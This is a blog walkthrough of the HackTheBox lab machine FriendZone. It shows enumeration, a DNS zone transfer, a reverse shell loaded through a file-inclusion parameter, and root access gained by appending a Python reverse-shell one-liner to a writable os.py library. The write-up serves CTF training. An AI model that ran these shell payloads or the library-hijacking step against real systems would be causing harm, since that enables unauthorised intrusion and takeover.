HacktheBox FriendZone: Walkthrough

HacktheBox Netmon: Walkthrough
June 29, 2019
Hackthebox LaCasaDePapel: Walkthrough
July 27, 2019
Share This:

HacktheBox FriendZone: Walkthrough

As other boxes lets start with nmap scan

NMAP

We have 21,22,53,80,139,443 and 445

PORT 139,445 (SMB)

on enumerating samba share i got general and Development share in general share i have permission to read and in Development read as well write :

Gathering Credentials from general share :

username : admin

Password : [email protected]#

Right now i dont know from where I’ll call the shell that’s why i move on other port’s

PORT 443

Checking Certificate

I have one domain here so with this I can give a try to dns zone transfer (machine name is also giving us the hint to do that.( “Friend” “ZONE”)

Lets try zone transfer against it

Command : dig axfr friendzone.red @10.10.10.123

I can successfully transfer zones 🙂 now lets add the entry in /etc/hosts file

Visiting administrator1 (subdomain)

i can login here with creds found on samba general share :

Credential : admin:[email protected]#

Visiting Dashboard

as given in the page i visited : image_id=a.jpg&pagename=timestamp

url : https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

Getting shell

Now i know from where i can call my shell so i uploaded “php-reverse-shell” in Development Share and call from the pagename parameter

Calling shell :

url : https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell

Way to User :

on checking the web directory i got one file which contains the credentials for the user friend

Reading user.txt

Privilege Escalation :

on running the pspy i saw one process is running as root :

/opt/server_admin/reporter.py

[email protected]:/opt/server_admin$ cat reporter.py 
#!/usr/bin/python

import os

to_address = "[email protected]"
from_address = "[email protected]"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to [email protected] -from [email protected] -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer
[email protected]:/opt/server_admin$ 

i don’t have the permission to write in this file so i checked if i can write in the python’s “os” file because the script is only importing the “os”

File location : /usr/lib/python2.7/os.py

Now i know i have permission to write in os.py i paste my python shell at the end of os.py

My Shell :

def myfunction():import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.30",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
myfunction()
Share This:

Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this: